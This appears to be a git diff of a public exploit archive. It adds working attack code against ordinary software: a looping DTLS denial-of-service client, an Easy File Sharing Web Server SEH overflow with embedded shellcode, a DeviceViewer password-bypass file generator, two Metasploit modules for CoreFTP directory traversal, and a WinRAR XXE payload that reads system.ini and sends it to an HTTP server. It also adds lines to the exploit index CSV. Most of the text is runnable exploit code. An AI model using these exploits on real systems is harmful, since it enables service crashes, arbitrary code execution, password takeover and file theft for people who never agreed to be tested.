addr.sin_family = AF_INET;
addr.sin_port = htons(port);
inet_pton(AF_INET, hostname, &(addr.sin_addr));
if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
{
closesocket(sockfd);
error("Failed to connect socket");
}
return sockfd;
}
SSL* DTLSConnection(const char* hostname)
{
int sockfd;
int result;
DTLSParams client;
sockfd = OpenUDPConnection(hostname, 3391);
client.ctx = SSL_CTX_new(DTLS_client_method());
client.bio = BIO_new_ssl_connect(client.ctx);
BIO_set_conn_hostname(client.bio, hostname);
BIO_get_ssl(client.bio, &(client.ssl));
SSL_set_connect_state(client.ssl);
SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
SSL_set_fd(client.ssl, sockfd);
if (SSL_connect(client.ssl) != 1) {
return NULL;
}
return client.ssl;
}
int send_dos_packet(SSL* ssl, int id) {
CONNECT_PKT_FRAGMENT packet;
packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
packet.usFragmentID = id;
packet.usNoOfFragments = id;
packet.cbFragmentLength = 1000;
memset(packet.fragment, 0x41, 1000);
char pkt[sizeof(packet)];
memcpy(&pkt, &packet, sizeof(packet));
return SSL_write(ssl, pkt, sizeof(pkt));
}
int main(int argc, char* argv[])
{
SSL* ssl;
int i = 0;
char* hostname;
if (argc != 2) {
printf("Usage: %s <IP address>\n", argv[0]);
return 0;
}
hostname = argv[1];
SOCKInit();
DTLSInit();
while (i++ > -1) {
ssl = DTLSConnection(hostname);
if (ssl == NULL) {
break;
}
for (int n = 0; n < 4; n++) {
send_dos_packet(ssl, i+n);
printf("Sending packet [%u]\n", i + n);
}
i++;
}
return 0;
}

87
exploits/windows/local/47411.py Executable file
View file

@ -0,0 +1,87 @@
#!/usr/bin/python
# Exploit Title: Easy File Sharing Web Server 7.2 local SEH overflow
# Date: 9/23/2019
# Exploit Author: x00pwn
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 7
# Exploit summary: When adding a new user to the application, you can exploit a local SEH buffer overflow
# by creating a malicious username, this exploit POC will create a malicious text file
# with the contents to execute arbitrary code.
# Author : Nu11pwn
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# found bad chars - "\x00\x0a\x0d"
shellcode = ""
shellcode += "\xbb\xc4\x1c\xb2\xd3\xdd\xc2\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x31\x31\x5e\x13\x83\xc6\x04\x03\x5e"
shellcode += "\xcb\xfe\x47\x2f\x3b\x7c\xa7\xd0\xbb\xe1\x21\x35"
shellcode += "\x8a\x21\x55\x3d\xbc\x91\x1d\x13\x30\x59\x73\x80"
shellcode += "\xc3\x2f\x5c\xa7\x64\x85\xba\x86\x75\xb6\xff\x89"
shellcode += "\xf5\xc5\xd3\x69\xc4\x05\x26\x6b\x01\x7b\xcb\x39"
shellcode += "\xda\xf7\x7e\xae\x6f\x4d\x43\x45\x23\x43\xc3\xba"
shellcode += "\xf3\x62\xe2\x6c\x88\x3c\x24\x8e\x5d\x35\x6d\x88"
shellcode += "\x82\x70\x27\x23\x70\x0e\xb6\xe5\x49\xef\x15\xc8"
shellcode += "\x66\x02\x67\x0c\x40\xfd\x12\x64\xb3\x80\x24\xb3"
shellcode += "\xce\x5e\xa0\x20\x68\x14\x12\x8d\x89\xf9\xc5\x46"
shellcode += "\x85\xb6\x82\x01\x89\x49\x46\x3a\xb5\xc2\x69\xed"
shellcode += "\x3c\x90\x4d\x29\x65\x42\xef\x68\xc3\x25\x10\x6a"
shellcode += "\xac\x9a\xb4\xe0\x40\xce\xc4\xaa\x0e\x11\x5a\xd1"
shellcode += "\x7c\x11\x64\xda\xd0\x7a\x55\x51\xbf\xfd\x6a\xb0"
shellcode += "\x84\xfc\x9b\x09\x10\x68\x02\xf8\x59\xf4\xb5\xd6"
shellcode += "\x9d\x01\x36\xd3\x5d\xf6\x26\x96\x58\xb2\xe0\x4a"
shellcode += "\x10\xab\x84\x6c\x87\xcc\x8c\x0e\x46\x5f\x4c\xff"
shellcode += "\xed\xe7\xf7\xff"
# Log data, item 69
# Address=0BADF00D
# Message= 0x10000000 | 0x10050000 | 0x00050000 | False | False | False | False | False | -1.0- [ImageLoad.dll] (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
# Log data, item 24
# Address=100195F2
# Message= 0x100195f2 : pop esi # pop ecx # ret | {PAGE_EXECUTE_READ} [ImageLoad.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll)
nseh = "\xEB\x06\x90\x90"
seh = "\xF2\x95\x01\x10"
payload = "A" * 4059
payload += nseh
payload += seh
payload += "\x90" * 16
payload += shellcode
payload += "D" *4000
# SEH chain of main thread, item 1
# Address=46336646
# SE handler=*** CORRUPT ENTRY ***
# Log data, item 34
# Address=0BADF00D
# Message= SEH record (nseh field) at 0x0018a938 overwritten with normal pattern : 0x46336646 (offset 4059), followed by 933 bytes of cyclic data after the handler
# [*] Exact match at offset 4059
try:
evilCreate =open("exploit.txt","w")
print("""
Easy File Sharing web server SEH overflow
""")
print("[x] Creating malicious file")
evilCreate.write(payload)
evilCreate.close()
print("[x] Malicious file create")
print("[x] Go to user accounts and add a new user with malicious name")
print("[x] Watch the program crash")
except:
print("[!] File failed to be created")

33
exploits/windows/local/47476.py Executable file
View file

@ -0,0 +1,33 @@
# Exploit Title: DeviceViewer 3.12.0.1 - Arbitrary Password Change
# Date: 2019-09-10
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Tested on: Windows 7
#!/usr/bin/python
# Steps to reproduce:
# 1. Generate the payload executing the PoC
# 2. Login in the Sricam DeviceViewer application as any registered user
# 3. Go to System Tools -> Change Password
# 4. Set the old password as the malicious payload, and the new password as whatever you want
# 5. The password will be changed with the new one
# 6. To confirm, restart the application and try to login with the new password
payload = "A" * 5000
try:
bypass = open("bypass.txt","w")
print("### Sricam DeviceViewer 3.12.0.1 Change Password Security Bypass")
print("### Author: Alessandro Magnosi\n")
print("[*] Creating old password file")
bypass.write(payload)
bypass.close()
print("[+] Old password file created\n")
print("[i] When changing password, set the old password to the file contents")
print("[i] Close the program and reopen it")
print("[i] Log in with new password")
except:
print("[!] Error creating the file")

620
exploits/windows/local/47981.txt Normal file
View file

File diff suppressed because one or more lines are too long

48
exploits/windows/remote/48194.txt Normal file
View file

@ -0,0 +1,48 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def proto
'ftp'
end
def initialize
super(
'Name' => 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal',
'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a \..\..\ substring, allowing an attacker to enumerate file existence based on the returned information},
'Author' => [ 'Kevin Randall' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-9648' ],
[ 'BID', '107446' ],
[ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ]
],
'Disclosure Date:' => 'March 13 2019'
)
register_options([
Opt::RPORT(21),
OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ),
OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ),
OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] )
])
end
def run_host(ip)
print_status("Logging into FTP server now with supplied credentials")
c = connect_login
return if not c
print_status("Performing exploitation of the SIZE command to enumerate files")
path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME']
res = send_cmd( ['SIZE', "C: ", path ], true, nsock = self.sock)
data = res.to_s
print_status("Performing analysis.... Please wait")
if (data.include? "213" )
print_good ("And the circle hits the square!")
print_good ("File Exists. Here is the filesize:"+ data[4..-1])
return res
else
print_error("Mission Failed We'll get them next time!")
print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect")
return res
end
end
end

48
exploits/windows/remote/48195.txt Normal file
View file

@ -0,0 +1,48 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def proto
'ftp'
end
def initialize
super(
'Name' => 'CVE-2019-9649 CoreFTP FTP Server Version 674 and below MDTM Directory Traversal',
'Description' => %q{An issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. Using the MDTM FTP command, a remote attacker can use a directory traversal (..\..\) to browse outside the root directory to determine the existence of a file on the operating system, and the last mofidied date.},
'Author' => [ 'Kevin Randall' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-9649' ],
[ 'BID', '107449' ],
[ 'URL', 'https://www.coreftp.com/forums/viewtopic.php?f=15&t=4022509' ]
],
'Disclosure Date:' => 'March 13 2019'
)
register_options([
Opt::RPORT(21),
OptString.new('FILENAME', [true, "Name of file to search on remote server", 'nslookup.exe'] ),
OptString.new('PATHTRAVERSAL', [true, "Traversal path Note: Default Drive used is C: ", "\\..\\..\\..\\..\\"] ),
OptString.new('PATHTOFILE', [ true, 'local filepath to the specified file. Please add double slashes for escaping', 'Windows\\System32\\'] )
])
end
def run_host(ip)
print_status("Logging into FTP server now with supplied credentials")
c = connect_login
return if not c
print_status("Performing exploitation of the MDTM command to enumerate files")
path = datastore['PATHTRAVERSAL'] + datastore['PATHTOFILE'] + "\\" + datastore['FILENAME']
res = send_cmd( ['MDTM', "C: ", path ], true, nsock = self.sock)
data = res.to_s
print_status("Performing analysis.... Please wait")
if (data.include? "213" )
print_good ("And the circle hits the square!")
print_good ("File Exists. Here is the last modified date for the file:"+ data[4..-1])
return res
else
print_error("Mission Failed We'll get them next time!")
print_error ("Something went wrong or the file does not exist. Please check your variables PATHTRAVERSAL and PATHTOFILE (please escape double backslash) or verify file extension as it may be incorrect")
return res
end
end
end

38
exploits/xml/local/47526.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: winrar 5.80 - XML External Entity Injection
# Exploit Author: hyp3rlinx
# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe
# Version: 5.80
# Tested on: Microsoft Windows Version 10.0.18362.418 64bit
# POC
1- python -m SimpleHTTPServer (listens Port 8000)
2- open winrar or any file.rar
3- help
4- help topics
5- Drag the exploit to the window
html file
<htmlL>
<body>
<xml>
<?xml version="1.0"?>
<!DOCTYPE flavios [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</body>
</html>
==============================
start.dtd
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>">
%all;

52
files_exploits.csv
View file

@ -6025,6 +6025,7 @@ id,file,description,date,author,type,platform,port
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux,
44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux,
44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux,
45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows,
45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows,
45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows,
@ -6578,6 +6579,9 @@ id,file,description,date,author,type,platform,port
47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
47393,exploits/windows/dos/47393.txt,"Notepad++ < 7.7 (x64) - Denial of Service",2019-09-16,"Bogdan Kurinnoy",dos,windows,
47404,exploits/watchos/dos/47404.pl,"SpotIE Internet Explorer Password Recovery 2.9.5 - 'Key' Denial of Service",2019-09-20,"Emilio Revelo",dos,watchos,
47406,exploits/watchos/dos/47406.py,"InputMapper 1.6.10 - Denial of Service",2019-09-23,elkoyote07,dos,watchos,
47410,exploits/windows/dos/47410.py,"DeviceViewer 3.12.0.1 - 'creating user' Denial of Service",2019-09-24,x00pwn,dos,windows,
47414,exploits/windows/dos/47414.txt,"Microsoft Windows cryptoapi - SymCrypt Modular Inverse Algorithm Denial of Service",2019-09-24,"Google Security Research",dos,windows,
47415,exploits/ios/dos/47415.txt,"iMessage - Decoding NSSharedKeyDictionary Can Read Object Out of Bounds",2019-09-24,"Google Security Research",dos,ios,
@ -6646,10 +6650,13 @@ id,file,description,date,author,type,platform,port
47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows,
47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
47795,exploits/windows/dos/47795.py,"SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
47800,exploits/php/dos/47800.py,"WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service",2019-12-17,roddux,dos,php,
47801,exploits/windows/dos/47801.py,"XnConvert 1.82 - Denial of Service (PoC)",2019-12-23,Gokkulraj,dos,windows,
47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
47849,exploits/windows/dos/47849.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
@ -6667,6 +6674,7 @@ id,file,description,date,author,type,platform,port
47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
47872,exploits/windows/dos/47872.py,"SpotDialup 1.6.7 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
47894,exploits/windows/dos/47894.py,"ZIP Password Recovery 2.30 - 'ZIP File' Denial of Service (PoC)",2020-01-09,ZwX,dos,windows,
@ -6685,6 +6693,7 @@ id,file,description,date,author,type,platform,port
47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows,
47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple,
47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
47963,exploits/windows/dos/47963.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
@ -10814,6 +10823,7 @@ id,file,description,date,author,type,platform,port
47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux,
47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos,
47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux,
47081,exploits/freebsd/local/47081.sh,"FreeBSD 12.0 - 'fd' Local Privilege Escalation",2019-07-10,gr4yf0x,local,freebsd,
47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,
47116,exploits/windows/local/47116.py,"Streamripper 2.6 - 'Song Pattern' Buffer Overflow",2019-07-15,"Andrey Stoykov",local,windows,
@ -10858,6 +10868,8 @@ id,file,description,date,author,type,platform,port
47389,exploits/windows/local/47389.txt,"AppXSvc - Privilege Escalation",2019-09-16,"Gabor Seljan",local,windows,
47394,exploits/windows/local/47394.py,"docPrint Pro 8.0 - SEH Buffer Overflow",2019-09-16,"Connor McGarr",local,windows,
47400,exploits/macos/local/47400.md,"macOS 18.7.0 Kernel - Local Privilege Escalation",2019-09-19,A2nkF,local,macos,
47409,exploits/ios/local/47409.txt,"iOS < 12.4.1 - 'Jailbreak' Local Privilege Escalation",2019-09-23,"Umang Raghuvanshi",local,ios,
47411,exploits/windows/local/47411.py,"Easy File Sharing Web Server 7.2 - 'New User' Local Overflow (SEH)",2019-09-24,x00pwn,local,windows,
47421,exploits/linux/local/47421.rb,"ABRT - sosreport Privilege Escalation (Metasploit)",2019-09-25,Metasploit,local,linux,
47429,exploits/windows/local/47429.py,"Mobatek MobaXterm 12.1 - Buffer Overflow (SEH)",2019-09-27,"Xavi Beltran",local,windows,
47444,exploits/windows/local/47444.py,"DameWare Remote Support 12.1.0.34 - Buffer Overflow (SEH)",2019-10-01,"Xavi Beltran",local,windows,
@ -10865,6 +10877,7 @@ id,file,description,date,author,type,platform,port
47466,exploits/linux/local/47466.c,"logrotten 3.15.1 - Privilege Escalation",2019-10-07,"Wolfgang Hotwagner",local,linux,
47468,exploits/windows_x86-64/local/47468.py,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (DEP)",2019-10-07,max7253,local,windows_x86-64,
47471,exploits/windows/local/47471.txt,"CheckPoint Endpoint Security Client/ZoneAlarm 15.4.062.17802 - Privilege Escalation",2019-10-07,"Jakub Palaczynski",local,windows,
47476,exploits/windows/local/47476.py,"DeviceViewer 3.12.0.1 - Arbitrary Password Change",2019-10-09,"Alessandro Magnosi",local,windows,
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
@ -10880,6 +10893,7 @@ id,file,description,date,author,type,platform,port
47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
47526,exploits/xml/local/47526.txt,"Winrar 5.80 - XML External Entity Injection",2019-10-21,hyp3rlinx,local,xml,
47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
@ -10991,6 +11005,7 @@ id,file,description,date,author,type,platform,port
47965,exploits/windows/local/47965.py,"Torrent 3GP Converter 1.51 - Stack Overflow (SEH)",2020-01-27,boku,local,windows,
47974,exploits/windows/local/47974.txt,"XMLBlueprint 16.191112 - XML External Entity Injection",2020-01-29,"Javier Olmedo",local,windows,
47975,exploits/windows/local/47975.c,"Microsoft Windows 10 - Theme API 'ThemePack' File Parsing",2020-01-29,"Eduardo Braun Prado",local,windows,
47981,exploits/windows/local/47981.txt,"Microsoft Windows Media Center WMV / WMA 6.3.9600.16384 - Code Execution",2020-01-30,"Eduardo Braun Prado",local,windows,
47999,exploits/linux/local/47999.txt,"Socat 1.7.3.4 - Heap-Based Overflow (PoC)",2020-02-05,hieubl,local,linux,
48000,exploits/linux/local/48000.sh,"xglance-bin 11.00 - Privilege Escalation",2020-02-05,redtimmysec,local,linux,
48009,exploits/windows/local/48009.txt,"ELAN Smart-Pad 11.10.15.1 - 'ETDService' Unquoted Service Path",2020-02-06,ZwX,local,windows,
@ -18052,11 +18067,13 @@ id,file,description,date,author,type,platform,port
47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080
47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25
47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80
47083,exploits/hardware/remote/47083.py,"Siemens TIA Portal - Remote Command Execution",2019-07-10,"Joseph Bingham",remote,hardware,
47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple,
47129,exploits/linux/remote/47129.rb,"PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)",2019-07-16,Metasploit,remote,linux,
47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
47157,exploits/android/remote/47157.txt,"Android 7 < 9 - Remote Code Execution",2019-07-24,"Marcin Kozlowski",remote,android,
47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
47187,exploits/php/remote/47187.rb,"WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
47195,exploits/linux/remote/47195.rb,"Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)",2019-07-30,Metasploit,remote,linux,6379
@ -18146,6 +18163,9 @@ id,file,description,date,author,type,platform,port
48186,exploits/multiple/remote/48186.rb,"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)",2020-03-09,Metasploit,remote,multiple,
48191,exploits/linux/remote/48191.rb,"Nagios XI - Authenticated Remote Command Execution (Metasploit)",2020-03-10,Metasploit,remote,linux,
48192,exploits/php/remote/48192.rb,"PHPStudy - Backdoor Remote Code execution (Metasploit)",2020-03-10,Metasploit,remote,php,
48194,exploits/windows/remote/48194.txt,"CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows,
48195,exploits/windows/remote/48195.txt,"CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)",2020-03-11,"Kevin Randall",remote,windows,
48196,exploits/linux/remote/48196.txt,"CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)",2020-03-11,AkkuS,remote,linux,
48214,exploits/hardware/remote/48214.py,"Drobo 5N2 4.1.1 - Remote Command Injection",2020-03-13,"Ian Sindermann",remote,hardware,
48223,exploits/linux/remote/48223.rb,"Rconfig 3.x - Chained Remote Code Execution (Metasploit)",2020-03-17,Metasploit,remote,linux,
48224,exploits/multiple/remote/48224.rb,"ManageEngine Desktop Central - Java Deserialization (Metasploit)",2020-03-17,Metasploit,remote,multiple,
@ -42141,6 +42161,7 @@ id,file,description,date,author,type,platform,port
47154,exploits/php/webapps/47154.py,"WordPress Plugin Hybrid Composer 1.4.6 - Improper Access Restrictions",2019-07-24,yasin,webapps,php,
47159,exploits/php/webapps/47159.txt,"Ovidentia 8.4.3 - Cross-Site Scripting",2019-07-25,n3k00n3,webapps,php,80
47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",2019-07-25,UserX,webapps,php,80
47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",2019-07-25,"Giovanni Chhatta",webapps,php,
47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",2019-07-26,"Fabian Mosch_ Nick Theisinger",webapps,php,80
